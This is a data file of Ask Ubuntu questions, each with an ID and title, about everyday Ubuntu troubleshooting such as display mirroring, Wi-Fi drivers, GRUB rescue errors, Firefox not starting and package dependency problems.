457616	mirror displays with ubuntu 14.04	some years ago i switched from windows to ubuntu . now ubuntu 14.04 is installed on my acer travelmate 5742g with : intel core i5-460m nvidia geforce gt 420m and nvidia binary driver version 331.38 15.6 hd ( 1366x768 ) when i used windows and had to present something in front of some people i mirrored the display of my laptop and the projector . this was really helpful because in most cases the display of the projector was behind me . unfortunately , this is not possible with ubuntu anymore . i tried it with various projectors and displays that worked with windows before . in cases the resoultion of both screens did not match windows cutted my screen and added two black bar to the sides of my laptop display . is it possible to add this very nice feature to ubuntu ? maybe i should add that ubuntu offers only one resolution for my laptop display . update 1 : here is an image of my screen setting ( in german , but the buttons are still the same ) :
457617	are there any gui apps that can create .desktop files ?	my question is simple . is there any fast and easy way of creating .desktop files for shortcuts ? for example , i think you can right click and create .desktop shortcuts in linux mint . i already know how to create them from a text editor like this : [ desktop entry ] type=application name=eclipse comment=eclipse ide icon=/home/jahedev/dev/eclipse-std/icon.png exec=/home/jahedev/dev/eclipse-std/eclipse terminal=false categories=development ; ide ; java ; startupwmclass=eclipse name [ en_us ] =eclipse so are there any gui apps that can do this ?
457619	sound not working in ubuntu 14.04	initially it was working fine and suddenly it stopped working . after installing amarok audio player . this is about the alsamixer looking for help ? thanks in advance
457628	owncloud server appears on software update of ubuntu 14.04	today , i got a popup to update my system . i agree updating , and i got this screen : my question : does owncloud server been embedded into ubuntu 14.04 ? if so , where could i find the code source ?
457630	usb device not recognizing in ubuntu 14.04 on lenovo z510	i bought new laptop lenov z510 i5 , before yesturday it was detecting usb device . i even tried external hard disk and reliance data card but both are not recognising either . please help me in resolving this . thank you .
457632	14.04 - mac mini - wireless connects but no internet	i was able to install 14.04 on a mac mini pretty easily . however , ( and i have searched for answers , here and other sources ) , the behavior is as follows : 1 ) able to connect to internet via ethernet 2 ) wireless networks show up and i am able to connect , but no internet connectivity over the connection , not able to browse or ping etc . one thing i have not tried , is turning on encryption of the wifi , but the mac is connecting solidly to the network over ubuntu ... so it is odd . the mac connects to the same network without issues when running osx , as do other devices . any guidance would be much appreciated . here are ifconfig and route output : jg @ jg-macmini : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:25:4b : bd:03:58 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:275 errors:0 dropped:0 overruns:0 frame:0 tx packets:275 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20497 ( 20.4 kb ) tx bytes:20497 ( 20.4 kb ) wlan0 link encap : ethernet hwaddr 00:25:00 : f8 : b7:45 inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :225 : ff : fef8 : b745/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:3995 tx packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:8626 ( 8.6 kb ) interrupt:19 jg @ jg-macmini : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface 10.42.0.0 * 255.255.255.0 u 9 0 0 wlan0 thanks
457633	argument of type 'instance ' is not iterable	at the last system upgrade ubuntu tried report an error , by oem-wireless-ath9k . after i gave my password , during the problem information collecting i got a message : '' an error occurred while attempting to process this problem report : argument of type 'instance ' is not iterable '' it seems ubuntu did not sent the error report , so the guys ca n't fix it . what should i do ? i have 12.04 version .
457635	what is a configuration to allow access to juju-gui in local provider	i want to install juju-gui using local provider ( re lxc ) on a cloud instance . however , the problem i have is that juju-gui will be installed into an lxc container itself and that container will be a non-routeable 10.x.x.x address . i made some progress following these general instructions after , creating my key files i made sure that the juju-gui container had a copy of them as well as the host ( /etc/ssl/certs and /etc/ssl/private in the host and /var/lib/lxc/cn_name/rootfs/etc/ssl/certs and /var/lib/lxc/cn_name/rootfs/etc/ssl/private in the container ) . pointing my browser to the public ip of the host cloud instance i do get redirected to juju-gui web admin login page but it just keeps spinning with `` connecting to juju environment '' ? ? i 'm sure someone has done this before but i 'm now stuck trying to figure out what is not configured right . my goal is to be able to point my browser to the cloud instance public address , login to juju-gui and because i 'm setup for local provider deploy additional charms/services into more lxc containers within that cloud instance .
457638	how do i create a persistent fedora live usb	i have successfully created a live usb for fedora 20 on my ubuntu 12.04 using dd : sudo dd bs=8m if=fedora-live-desktop-x86_64-20-1.iso of=/dev/sdb but i have not been able to find out how to make it persistent . any suggestions ? startup disk creator is not an option because i am unable to select an iso file . unetbootin failed when i added 512 mbs that should persist and also without it . ( 2 gb usb stick ) warning : could not boot warning : /dev/disk/by-label/fedora-live-desktop-x86_64-20-1 does not exist warning : /dev/mapper/live-rw does not exist resulting logs : rdsosreport , journalctl
457639	vlc completely stopped working	vlc suddenly stopped working , this is what i get now when i try to run it : main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . main interface error : option qt-volume-complete does not exist skins2 interface error : no suitable dialogs provider found ( hint : compile the qt4 plugin , and make sure it is loaded properly ) skins2 interface error : can not instantiate qt4 dialogs provider i tried reinstalling multiple times , and there is no other program using the qt4 libraries . also , the command line interface does n't appear to do anything . when i try to `` force '' the qt4 interface , i get : main interface error : no suitable interface module main libvlc error : interface `` default '' initialization failed ldconfig -p | grep libqt : libqtxmlpatterns.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtxmlpatterns.so.4 libqtxml.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtxml.so.4 libqtsql.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtsql.so.4 libqtscript.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtscript.so.4 libqtnetwork.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtnetwork.so.4 libqtgui.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtgui.so.4 libqtdeclarative.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtdeclarative.so.4 libqtdbus.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtdbus.so.4 libqtcore.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtcore.so.4 libqtclucene.so.4 ( libc6 , hard-float ) = > /usr/lib/arm-linux-gnueabihf/libqtclucene.so.4
457643	google-chrome tab fonts in kubuntu look ugly - how to fix ?	this is a recurring problem with kubuntu for me . when i install it on top of a ubuntu installation ( packages kubuntu-desktop or kubuntu-full ) , i get ugly fonts . does anyone know how to fix the fonts for the tabs of google chrome ? in ubuntu they are very sharp :
457644	memory and the oom killer problem	i got a laptop with 4gb memory and 14.04 , and i see regular oom killer that kills processes and high cpu from swapd but swap is almost not used . but i want to understand this happens and/or how i can debug this . for kernel messages from oom killer see pastebin : http : //pastebin.com/q70ky89y cat /proc/meminfo memtotal : 3888804 kb memfree : 162524 kb buffers : 808 kb cached : 2613828 kb swapcached : 79836 kb active : 2629344 kb inactive : 867316 kb active ( anon ) : 2594892 kb inactive ( anon ) : 802108 kb active ( file ) : 34452 kb inactive ( file ) : 65208 kb unevictable : 8668 kb mlocked : 8668 kb swaptotal : 8429564 kb swapfree : 7791116 kb dirty : 3984 kb writeback : 0 kb anonpages : 875420 kb mapped : 1814944 kb shmem : 2511320 kb slab : 76788 kb sreclaimable : 33276 kb sunreclaim : 43512 kb kernelstack : 5560 kb pagetables : 57392 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 10373964 kb committed_as : 8367980 kb vmalloctotal : 34359738367 kb vmallocused : 355528 kb vmallocchunk : 34359376496 kb hardwarecorrupted : 0 kb anonhugepages : 161792 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 97204 kb directmap2m : 3938304 kb
457646	apache webserver issue with django project	i am using django 1.6 , apache2 and ubuntu 13.10 . i have created few django projects and it is running good locally but when i deploy it in apache server ( locally ) the default apache ( 'it works ! ' page ) web page is rendering . please go through the following code i have used . what i missed ? firstweb.conf < virtualhost *:8100 > wsgiscriptalias / /home/apachefolder/firstweb.wsgi servername firstweb.com alias /static /var/www/firstweb/static/ < directory /var/www/firstweb > order allow , deny allow from all < /directory > < /virtualhost > firstweb.wsgi import os import sys os.environ [ 'django_settings_module ' ] = 'firstweb.settings' import django.core.handlers.wsgi applications = django.core.handlers.wsgi.wsgihandler ( ) path = '/var/www/firstweb/' if path not in sys.path : sys.path.append ( path ) i have the `` firstweb '' django project inside `` /var/www/ '' also i have installed all the requirements for apache server and for my project in the 'hosts ' file i mentioned my firstweb.com corresponding to my ip address
457647	dns problem ? 12.04 lts	i had a power outage yesterday , and my previous setup with 12.04 lts was working smoothly . now , my webserver is n't accessible to the outside world , and nor is my moo server . i have a static ip , and use port forwarding on my router to direct traffic to my server . here 's my testing : ca n't ping google from server ca n't access web from server can ping server ( 192.168.xx.xx ) from my other work station can ping my ip ( 124.254.xx.xx ) from my other work station i 'm using ufw - ports 23 , 7777 and 80 are open . firewall is active . port forwarding is working to the correct ip address . i tested to see if the ports were visible - canyouseeme.org shows 80 and 7777 closed . i 'm a noob , so i may have left something off the fresh install i did a few weeks ago . but it had all been working well . the install worked out of the box - no special fixes . i 've trawled the web and this forum to find a fix . i commented out # dns=dnsmasq in networkmanager.conf - to no avail . i can recall in a previous install , having to add info to a config file regarding my ip address - at tis stage i 'm not worried about domain names . the best i 've come up with is to add dns-nameservers 8.8.8.8 8.8.4.4 to /etc/network/interface* . i really need to have the moo up and running ( it is running , but not accessible ) . you could say i 'm desperate . look forward to any advice you may be able to provide .
457650	where is new firefox	how do you update firefox ? i tried doing it in the `` about firefox '' menu but it is n't there like in windows . i also tried using synaptic but the highest available version there was 28 not 29 that i want .
457651	ubuntu 14.04 lots of software not working anymore	so i made a clean install of ubuntu 14.04 64 bit , but a lot of programs do not work even they came with the ubuntu install . firefox does not start , neither from launcher nor from terminal thunderbird the same kompozer huawei k3770 not recognized can you guide me in the right direction ? eric
457652	add new ip address to my hosting	i 'm sory if its already answered but i 'm very newbie and as i can see the other answers interfaces configurations are different than mine and i 'm confused and worried about doing something wrong . my hosting main ip address is : ip : 85.25.x.y i 'm requested a new ip from my hosting which is : ip : 62.75.a.b netmask : 255.255.255.255 i ping this new ip address but cant get response i googled and i think i should change my /etc/network/interfaces file . here it is : auto lo iface lo inet loopback auto eth1 iface eth1 inet static address 85.25.x.y netmask 255.255.255.192 gateway 85.25.x.1 auto eth0 iface eth0 inet manual how should i change this file ? i really need help , thank you in advanced i did it ! it was so simple ! ! i just add below lines and type /etc/init.d/networking restart auto eth1:1 iface eth1:1 inet static address 62.11.22.33 netmask 255.255.255.255
457654	nuvola player not working with google play music	i installed nuvola player from its stable ppa repo . i can open it , sign in to google play and view my library etc . but once i try to play a track , the loading image ( rotating arrow ) appears and it stays like that forever ( have to close the program ) . my machine is running ubuntu gnome 13.04 . any help is highly appreciated .
457655	unity not loading , how can i troubleshoot ?	all of a sudden , when i log in to ubuntu 14.04 , i have no top menu bar , no launcher , no dash , only my desktop . shortcuts like alt-f2 do n't work either . logging in as guest works worked fine . at first i tried the ubuntu-tweak-tool tips laid out here , and ran unity-tweak-tool -- reset-unity . the only effect , though was that unity stopped working for all accounts ! i also tried the compizconfig-settings-manager mentioned in many threads , with no effect . i also tried reinstalling ubuntu-deskop and unity . do n't know if it 's relevant , but if i log in as guest , do ctrl-alt-f1 to open a terminal , log in as my user , run `startx ' to open another gui session , and then try starting unity from the terminal , it says âinvalid mit-magic-cookieâ . also , ~/.xsession-errors has a lot of error like this : accountsservice-warning ** : setinputsources call failed : gdbus.error : org.freedesktop.accounts , error.permissiondenied : not authorized what else can i do to troubleshoot ? the following workaround will give most of unity ( not the top menu bar ) back around 50 % of the times , but only for the current session : switch to terminal , and then export display=:0 unity-tweak-tool -- reset-unity unity
457656	firefox will not open ( ubuntu 14.04 in vmware player )	ubuntu is freshly installed under vmware player for testing . firefox will not open in ubuntu 14.04 lts ( desktop ) . there are no instances of firefox running in system monitor . what can be the reason , and is there a solution ? i have firefox opened from the terminal . problem , i can not add a screenshot to askubuntu ( i need at least 10 reputation to post images ) . the output : ( process:2286 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:2286 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:2286 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( firefox:2286 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( firefox:2286 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised kan de gnome-sneltoetsenmap '/home/ubuntu/.gnome2/accels ' niet maken : toegang geweigerd '' kan de gnome-sneltoetsenmap '/home/ubuntu/.gnome2/accels ' niet maken : toegang geweigerd '' is dutch and means `` can not create the gnome shortcut directory '/home/ubuntu/.gnome2/accels ' : access denied '' .
457658	ubuntu 14.04 lts screen is flickering on dell optiplex 9010 aio system .	i have just installed ubuntu 14.04 lts alongside windows 7 on dell optiplex 9010 , all in one system . as i boot from my bootable pendrive then screen flickers . i thought that problem may get solved after installation is complete but after installation screen is still flickering . far left side has less flickering compared to far right side . since everything is working fine in windows 7 so it seems issue of graphics drivers but i could not find any driver . i tried to install ubuntu 12.04 lts but problem was not resolved .
457659	ubuntu disk management	so , i notice when i open up `` disks '' , that it is showing 3 partitions on my main drive . 1 is the system , 1 is the swap , but the other is simply labeled as `` extended partition '' so what i 'm wondering is # 1 , is this `` extended partition '' really necessary ? ( what 's it do ? ) , and # 2 can i get rid of it , and resize my swap partition ( or resize my main partition to incorporate the extra 16g ) see screenshot ... and please note , this is an ssd ( blue = the `` extended partition '' )
457660	all firefox pop-ups dont have close or minimise button	all firefox click pop-ups dont have close button . i have to click the launcher icon to show both the windows , only from there i can close it . is there any fix . i have disable pop-ups on default .
457667	can not get realtek8188ee to work in 14.04	i have a toshiba satellite c55-a5300 laptop . when i run lspci -nn it shows 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) it has always had the common problem others have asked about here ( and many , many other places on the web ) where it would connect , then drop the connection at random intervals . i tried every solution i could find , here & elsewhere , and they always caused errors after running `` make '' ( more details below ) , but as i could still connect to networks i just dealt with it . i upgraded to 14.04 a few days ago and now it wo n't connect at all - i need help getting this to work . i originally followed the instructions posted by chili555 found here : wireless not working on toshiba satellite c55-a5281 , but i get the following errors when running `` make '' : /home/dan/backports-3.11-rc3-1/net/wireless/sysfs.c:151:2 : error : unknown field ‘dev_attrs’ specified in initializer .dev_attrs = ieee80211_dev_attrs , ^ /home/dan/backports-3.11-rc3-1/net/wireless/sysfs.c:151:2 : warning : initialization from incompatible pointer type [ enabled by default ] /home/dan/backports-3.11-rc3-1/net/wireless/sysfs.c:151:2 : warning : ( near initialization for ‘ieee80211_class.suspend’ ) [ enabled by default ] make [ 6 ] : * [ /home/dan/backports-3.11-rc3-1/net/wireless/sysfs.o ] error 1 make [ 5 ] : [ /home/dan/backports-3.11-rc3-1/net/wireless ] error 2 make [ 4 ] : [ module/home/dan/backports-3.11-rc3-1 ] error 2 make [ 3 ] : [ modules ] error 2 make2 : [ modules ] error 2 make1 : * [ modules ] error 2 make : * [ default ] error 2 i have no clue how to diagnose the problem or how to proceed from here . i also do n't know what information one might need from me in order to move forward . i 'll be happy to share anything you 'd like to know if it results in this thing ( finally ! ) working properly . thanks in advance for any / all help . eta : i did see this post - realtek 8188ee wireless driver solved - and it looks like it is discussing the same problem i 'm having , but i can not for the life of me figure out what i had to add the testing repository to my /etc/apt/sources.list means , so i am still stuck .
457668	ethernet controller not working on new dell vostro 2520 laptop [ solved ]	i am very new to ubuntu . just today i when i tried to plug in my lan cable it was showing nothing . the result of `` sudo lshw -c network '' showing ethernet controller under *-network uncalimed . in system > network no wired connection is showing . please help suravi @ suravi-vostro-2520 : ~ $ lspci -nn |grep 0200 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 )
457669	cant bind guake on f12 key	after ubuntu update to 13.10 guake did n't appear on f12 key . i tried to change it to another f-key , but get message : `` unable to bind global f12 key '' . any ideas how to get this to work again ?
457670	troubles with ubuntu updating from 12.04 to 14.04 : grub rescue	i have a big problem . i have a sony vaio laptop uefi with windows 7 and ubuntu . i had the version 12.04 , then i update it using the update manager and now when i turn on the pc instead of let me choose in which partition i want to enter , all goes black and there 's only the writing : error : file not found grub rescue > using live usb i tried with boot repair but it did n't work ( here 's the report http : //paste.ubuntu.com/7324719/ ) , it said me that i have a broken wubi , but i think i have n't installed it with wubi ( i 'm not sure but it should be so ) . i tried to reinstall ubuntu but it did n't do anything . in addition , i can not use neither the windows recovery because it gives me the same grub rescue error . may i have some problem with the boot partition ? here 's the list of my partition : model : ata st500lm012 hn-m5 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 274mb 273mb fat32 efi system partition hidden , msftdata 2 274mb 16.8gb 16.5gb ntfs basic data partition hidden , diag 3 16.8gb 17.1gb 273mb fat32 efi system partition boot 4 17.1gb 17.2gb 134mb microsoft reserved partition msftres 5 17.2gb 317gb 300gb ntfs basic data partition msftdata 6 317gb 318gb 999mb linux-swap ( v1 ) 7 318gb 500gb 182gb ext4 msftdata model : lexar jumpdrive ( scsi ) disk /dev/sdb : 16.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1024b 16.0gb 16.0gb primary fat32 boot i wish to save my files if it 's possible ( i 've already take the most important ones using live usb ) , but first now i want to save my pc ; ) thank you so much .
457671	could n't install wine	i wanted to install wine , but then it gave me this message : '' to install wine , this package has to be removed : nvida opencl driver and icd loader library '' can anyone help me with this ? and how can i remove this package ?
457672	how to get lubuntu to work on a pc from the year 2004 ?	we have a hp pavilion v72 desktop computer from the year 2004 . it had windows xp running on it , and we have been trying to install linux on it . after ubuntu , we tried to install the 32 bit version of lubuntu 13.10 from a disk image downloaded directly from the lubuntu.net web page , and it said it was successfully installed but after re-start it does n't start the graphical user interface , eg . the screen remains black after the spash screen . the same happens , when we choose the option `` try lubuntu '' . the computer 's specifications meet the requirements of the lubuntu distribution . it has two graphic cards , one onboard , which ca n't be disabled in the bios and another one , which is configured as primary display adapter in the bios . the system can be booted to root shell and everythings appears to be fine , but when x-windows is started , the computer again hangs with an empty screen . do you have any suggestions , if trying another linux distribution ( like xubuntu ) might potentially solve the problem ? until recently , when we wiped the windows xp system , the computer worked perfectly well , so we do n't assume , that the computer 's hardware is defective . many thanks . anne
457673	ca n't install pantheon desktop environment	i 've tried to install pantheon desktop environment several times . i tried sudo apt-get update and sudo apt-get upgrade , but it 's no use . iâm just a very new beginner . this is what iâve done : quanglong @ ubuntu : ~ $ sudo add-apt-repository ppa : elementary-os/daily [ sudo ] password for quanglong : you are about to add the following ppa to your system : attention ! do not install this ppa if you want a tested running system , this ppa contains the newest and most unstable development of elementary , it 's useful only if you are a developer and are not afraid to encounter critical bugs . also this ppa may overwrite already installed packages you do n't want it to ! more info : https : //launchpad.net/~elementary-os/+archive/daily press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpkz5d_z/secring.gpg ' created gpg : keyring `/tmp/tmpkz5d_z/pubring.gpg ' created gpg : requesting key 4e1f8a59 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpkz5d_z/trustdb.gpg : trustdb created gpg : key 4e1f8a59 : public key `` launchpad ppa for elementary os team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok /bin/rm : can not remove `/run/user/root/gvfs ' : is a directory quanglong @ ubuntu : ~ $ sudo apt-get update hit http : //ppa.launchpad.net quantal release.gpg get:1 http : //security.ubuntu.com quantal-security release.gpg [ 933 b ] hit http : //us.archive.ubuntu.com quantal release.gpg hit http : //ppa.launchpad.net quantal release.gpg get:2 http : //security.ubuntu.com quantal-security release [ 49.6 kb ] get:3 http : //us.archive.ubuntu.com quantal-updates release.gpg [ 933 b ] hit http : //us.archive.ubuntu.com quantal-backports release.gpg hit http : //ppa.launchpad.net quantal release hit http : //us.archive.ubuntu.com quantal release hit http : //ppa.launchpad.net quantal release get:4 http : //us.archive.ubuntu.com quantal-updates release [ 49.6 kb ] hit http : //ppa.launchpad.net quantal/main sources get:5 http : //security.ubuntu.com quantal-security/main sources [ 74.3 kb ] hit http : //ppa.launchpad.net quantal/main amd64 packages hit http : //ppa.launchpad.net quantal/main i386 packages hit http : //us.archive.ubuntu.com quantal-backports release hit http : //us.archive.ubuntu.com quantal/main sources hit http : //us.archive.ubuntu.com quantal/restricted sources hit http : //us.archive.ubuntu.com quantal/universe sources hit http : //ppa.launchpad.net quantal/main sources hit http : //us.archive.ubuntu.com quantal/multiverse sources get:6 http : //security.ubuntu.com quantal-security/restricted sources [ 1,833 b ] hit http : //us.archive.ubuntu.com quantal/main amd64 packages hit http : //ppa.launchpad.net quantal/main amd64 packages hit http : //us.archive.ubuntu.com quantal/restricted amd64 packages get:7 http : //security.ubuntu.com quantal-security/universe sources [ 23.8 kb ] hit http : //ppa.launchpad.net quantal/main i386 packages hit http : //us.archive.ubuntu.com quantal/universe amd64 packages hit http : //us.archive.ubuntu.com quantal/multiverse amd64 packages get:8 http : //security.ubuntu.com quantal-security/multiverse sources [ 1,169 b ] hit http : //us.archive.ubuntu.com quantal/main i386 packages hit http : //us.archive.ubuntu.com quantal/restricted i386 packages get:9 http : //security.ubuntu.com quantal-security/main amd64 packages [ 207 kb ] hit http : //us.archive.ubuntu.com quantal/universe i386 packages hit http : //us.archive.ubuntu.com quantal/multiverse i386 packages hit http : //us.archive.ubuntu.com quantal/main translation-en hit http : //us.archive.ubuntu.com quantal/multiverse translation-en hit http : //us.archive.ubuntu.com quantal/restricted translation-en hit http : //us.archive.ubuntu.com quantal/universe translation-en get:10 http : //us.archive.ubuntu.com quantal-updates/main sources [ 134 kb ] get:11 http : //security.ubuntu.com quantal-security/restricted amd64 packages [ 3,469 b ] get:12 http : //security.ubuntu.com quantal-security/universe amd64 packages [ 72.4 kb ] ign http : //ppa.launchpad.net quantal/main translation-en_us get:13 http : //us.archive.ubuntu.com quantal-updates/restricted sources [ 2,564 b ] ign http : //ppa.launchpad.net quantal/main translation-en get:14 http : //us.archive.ubuntu.com quantal-updates/universe sources [ 96.7 kb ] ign http : //ppa.launchpad.net quantal/main translation-en_us get:15 http : //security.ubuntu.com quantal-security/multiverse amd64 packages [ 1,488 b ] ign http : //ppa.launchpad.net quantal/main translation-en get:16 http : //security.ubuntu.com quantal-security/main i386 packages [ 205 kb ] get:17 http : //us.archive.ubuntu.com quantal-updates/multiverse sources [ 5,269 b ] get:18 http : //us.archive.ubuntu.com quantal-updates/main amd64 packages [ 337 kb ] get:19 http : //us.archive.ubuntu.com quantal-updates/restricted amd64 packages [ 4,804 b ] get:20 http : //us.archive.ubuntu.com quantal-updates/universe amd64 packages [ 218 kb ] get:21 http : //security.ubuntu.com quantal-security/restricted i386 packages [ 3,531 b ] get:22 http : //security.ubuntu.com quantal-security/universe i386 packages [ 73.0 kb ] get:23 http : //us.archive.ubuntu.com quantal-updates/multiverse amd64 packages [ 12.1 kb ] get:24 http : //security.ubuntu.com quantal-security/multiverse i386 packages [ 1,726 b ] hit http : //security.ubuntu.com quantal-security/main translation-en get:25 http : //us.archive.ubuntu.com quantal-updates/main i386 packages [ 334 kb ] hit http : //security.ubuntu.com quantal-security/multiverse translation-en hit http : //security.ubuntu.com quantal-security/restricted translation-en hit http : //security.ubuntu.com quantal-security/universe translation-en get:26 http : //us.archive.ubuntu.com quantal-updates/restricted i386 packages [ 4,841 b ] get:27 http : //us.archive.ubuntu.com quantal-updates/universe i386 packages [ 219 kb ] get:28 http : //us.archive.ubuntu.com quantal-updates/multiverse i386 packages [ 12.3 kb ] hit http : //us.archive.ubuntu.com quantal-updates/main translation-en hit http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en hit http : //us.archive.ubuntu.com quantal-updates/restricted translation-en hit http : //us.archive.ubuntu.com quantal-updates/universe translation-en hit http : //us.archive.ubuntu.com quantal-backports/main sources hit http : //us.archive.ubuntu.com quantal-backports/restricted sources ign http : //security.ubuntu.com quantal-security/main translation-en_us hit http : //us.archive.ubuntu.com quantal-backports/universe sources ign http : //security.ubuntu.com quantal-security/multiverse translation-en_us hit http : //us.archive.ubuntu.com quantal-backports/multiverse sources ign http : //security.ubuntu.com quantal-security/restricted translation-en_us hit http : //us.archive.ubuntu.com quantal-backports/main amd64 packages ign http : //security.ubuntu.com quantal-security/universe translation-en_us hit http : //us.archive.ubuntu.com quantal-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com quantal-backports/universe amd64 packages hit http : //us.archive.ubuntu.com quantal-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com quantal-backports/main i386 packages hit http : //us.archive.ubuntu.com quantal-backports/restricted i386 packages hit http : //us.archive.ubuntu.com quantal-backports/universe i386 packages hit http : //us.archive.ubuntu.com quantal-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com quantal-backports/main translation-en hit http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en hit http : //us.archive.ubuntu.com quantal-backports/restricted translation-en hit http : //us.archive.ubuntu.com quantal-backports/universe translation-en ign http : //us.archive.ubuntu.com quantal/main translation-en_us ign http : //us.archive.ubuntu.com quantal/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/main translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/main translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/universe translation-en_us fetched 2,151 kb in 45s ( 47.7 kb/s ) reading package lists ... done /bin/rm : can not remove `/run/user/root/gvfs ' : is a directory quanglong @ ubuntu : ~ $ sudo apt-get install elementary-desktop reading package lists ... done building dependency tree reading state information ... done e : unable to locate package elementary-desktop /bin/rm : can not remove `/run/user/root/gvfs ' : is a directory quanglong @ ubuntu : ~ $
457675	the indicator icon of copy.com disappeared or the menu is unreadable	copy.com is a commercial service offering free space ( much like dropbox and , once , ubuntuone ) . starting with version 13.10 and continuing with 14.04 , two bugs plague the copy.com application on ubuntu ( see this thread ) : sometimes , the application indicator is not at all visible even if it is visible , the menu is not readable ( no menu entries except for one or two ) , like this : how can i get rid of these two bugs ?
457681	how to recover from failed installment of codelite	my system initially is ubuntu 12.04 . i installed codelite yesterday by running `` apt-get install codelite '' , it worked fine . i noticed that it is not the latest version and tried installing the latest manually , but this introduced problem . i followed the instruction from codelite web page : sudo apt-key adv -- fetch-keys http : //repos.codelite.org/codelite.asc sudo apt-add-repository 'deb http : //repos.codelite.org/ubuntu/ trusty universe' sudo apt-get update sudo apt-get install codelite but i got dependency error just like this one . i then tried several suggestions , the latest is http : //www.eurobytes.nl/tutorials/howto-install-the-latest-codelite-in-ubuntu . but i missed the note about `` amd64 '' and `` i386 '' initially and after i corrected , there still problem . anyway , i give up installing the latest version at this point , but i found that i can not go back now - i uninstalled codelite in the beginning - when i run `` apt-get install codelite '' again , i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : codelite : depends : libpango-1.0-0 ( > = 1.18.0 ) but it is not installable depends : libpangocairo-1.0-0 ( > = 1.14.0 ) but it is not installable depends : libtiff5 ( > = 4.0.3 ) but it is not installable depends : libwxbase3.0-0 ( > = 3.0.0 ) but it is not installable depends : libwxgtk3.0-0 ( > = 3.0.0 ) but it is not installable e : unable to correct problems , you have held broken packages . could you point me how i can recover from this ?
457684	how can i install firefox addons in ubuntu ?	i am using ubuntu 14.04 and i am browsing with the newest firefox . where can i get addons/plugins ( for example adblock ) and how do i install them ?
457685	i can not find the ff multi converter for ubuntu 14.04 lts	is there a version of ff multi converter for ubuntu 14.04 ? i installed the ppa , but the program exists only for older versions . in ppa there is not a version for ubuntu trusty . is there a place where i could get it ?
